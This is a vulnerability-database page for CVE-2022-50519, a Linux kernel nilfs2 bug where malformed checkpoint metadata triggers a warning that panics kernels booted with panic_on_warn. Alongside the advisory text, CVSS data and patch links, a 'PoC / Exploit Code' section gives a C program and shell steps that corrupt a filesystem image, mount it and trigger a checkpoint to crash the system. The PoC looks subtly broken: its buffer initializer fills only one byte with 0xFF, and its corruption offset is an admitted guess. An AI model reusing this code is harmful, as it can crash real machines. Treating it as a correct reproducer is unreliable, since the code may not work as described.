Security Vulnerability Report
CVE-2022-50519 CVSS 5.5 MEDIUM

Published: 2025-10-07 16:15:36
Last Modified: 2026-03-17 14:13:36
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved:

nilfs2: replace WARN_ONs by nilfs_error for checkpoint acquisition failure

If creation or finalization of a checkpoint fails due to anomalies in the checkpoint metadata on disk, a kernel warning is generated.

This patch replaces the WARN_ONs by nilfs_error, so that a kernel, booted with panic_on_warn, does not panic. A nilfs_error is appropriate here to handle the abnormal filesystem condition.

This also replaces the detected error codes with an I/O error so that neither of the internal error codes is returned to callers.

CVSS Details

CVSS Score: 5.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
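Linux kernel < 5c0776b5bc31 (fixed version in the stable branch)
Linux kernel < 090fcfb6edeb (fixed version in the stable branch)
Linux kernel < 259c0f68168a (fixed version in the stable branch)
Linux kernel < 723ac751208f (fixed version in the stable branch)
Linux kernel < 8a18fdc5ae8e (fixed version in the stable branch)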

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
c
// PoC: Trigger nilfs2 checkpoint failure to cause kernel panic
// This PoC demonstrates how to trigger the vulnerability by creating
// a corrupted nilfs2 filesystem image with invalid checkpoint metadata.
// Run with a kernel booted with panic_on_warn=1 to observe the panic.
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/mount.h>

/*
 * Steps to reproduce:
 * 1. Create a nilfs2 filesystem image
 *    $ dd if=/dev/zero of=nilfs.img bs=1M count=100
 *    $ mkfs.nilfs2 nilfs.img
 *
 * 2. Corrupt the checkpoint metadata area in the image
 *    (e.g., modify the checkpoint file's segment summary)
 *
 * 3. Mount the corrupted image with loop device
 *    $ sudo losetup /dev/loop0 nilfs.img
 *    $ sudo mount -t nilfs2 /dev/loop0 /mnt/nilfs
 *
 * 4. Trigger checkpoint operation
 *    $ sudo nilfs-clean /mnt/nilfs
 *    or perform filesystem operations that trigger checkpoint
 *
 * 5. On vulnerable kernel with panic_on_warn=1, system will panic
 */
int main(int argc, char *argv[])
{
    if (argc < 2) {
        fprintf(stderr, "Usage: %s <nilfs_image>\n", argv[0]);
        return 1;
    }

    const char *image = argv[1];
    int fd = open(image, O_RDWR);
    if (fd < 0) {
        perror("open");
        return 1;
    }

    /* Corrupt checkpoint metadata - offset depends on nilfs2 layout */
    /* The checkpoint file area typically starts after the superblock */
    off_t cp_offset = 0x1000; /* example offset */
    unsigned char corrupt_data[4096] = {0xFF}; /* invalid metadata */

    if (pwrite(fd, corrupt_data, sizeof(corrupt_data), cp_offset) < 0) {
        perror("pwrite");
        close(fd);
        return 1;
    }

    /* off_t is not guaranteed to be long, so cast it for %ld */
    printf("Checkpoint metadata corrupted at offset %ld\n", (long)cp_offset);
    printf("Now mount the image to trigger the vulnerability:\n");
    printf("  sudo losetup /dev/loop0 %s\n", image);
    printf("  sudo mount -t nilfs2 /dev/loop0 /mnt/nilfs\n");
    printf("  sudo nilfs-clean /mnt/nilfs  # trigger checkpoint\n");

    close(fd);
    return 0;
}

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2022-50519", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2025-10-07T16:15:35.610", "lastModified": "2026-03-17T14:13:35.690", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnilfs2: replace WARN_ONs by nilfs_error for checkpoint acquisition failure\n\nIf creation or finalization of a checkpoint fails due to anomalies in the\ncheckpoint metadata on disk, a kernel warning is generated.\n\nThis patch replaces the WARN_ONs by nilfs_error, so that a kernel, booted\nwith panic_on_warn, does not panic. A nilfs_error is appropriate here to\nhandle the abnormal filesystem condition.\n\nThis also replaces the detected error codes with an I/O error so that\nneither of the internal error codes is returned to callers."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "2.6.30", "versionEndExcluding": "4.9.331", "matchCriteriaId": "068F561C-725E-4CD5-AB33-06B14EAD1591"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.10", "versionEndExcluding": "4.14.296", "matchCriteriaId": "1927ABC6-E0D2-478F-B103-B982A42D1158"}, 
{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.15", "versionEndExcluding": "4.19.262", "matchCriteriaId": "D6B62970-1FAD-4ED6-930A-23E26A8D2E08"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.20", "versionEndExcluding": "5.4.218", "matchCriteriaId": "ED2FAD62-84D0-451F-9F4D-66173BBD59E2"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.5", "versionEndExcluding": "5.10.148", "matchCriteriaId": "A125CF4C-603D-4ED4-AE18-CFC7C8D5CCF1"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.11", "versionEndExcluding": "5.15.74", "matchCriteriaId": "381A1822-66FA-4BF1-BCA9-7AF2DFCFFBE4"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.16", "versionEndExcluding": "5.19.16", "matchCriteriaId": "950EB0FE-7220-47B0-A80D-CEFD803A69C2"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.0", "versionEndExcluding": "6.0.2", "matchCriteriaId": "B0624AD1-5A88-463E-96D1-F938FCBA6EEA"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/090fcfb6edeb9367a915b2749e2bd1f8b48d8898", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/259c0f68168ac6a598db3486597b10e74d625db0", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/5c0776b5bc31de7cd28afb558fae37a20f33602e", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/723ac751208f6d6540191689cfbf6c77135a7a1b", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/8a18fdc5ae8e6d7ac33c6ee0a2e5f9f1414ef412", "source": 
"416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/ae16440c44ae2acda6d72aff9d74eccf8967dae5", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/b63026b5e13040cd5afa11769dd0d9e1504b031a", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/bf98be80cbe3b4e6c86c36ed00457389aca3eb15", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/c0c3d3d3ea41cb5228ee90568bb953f9a56c3227", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}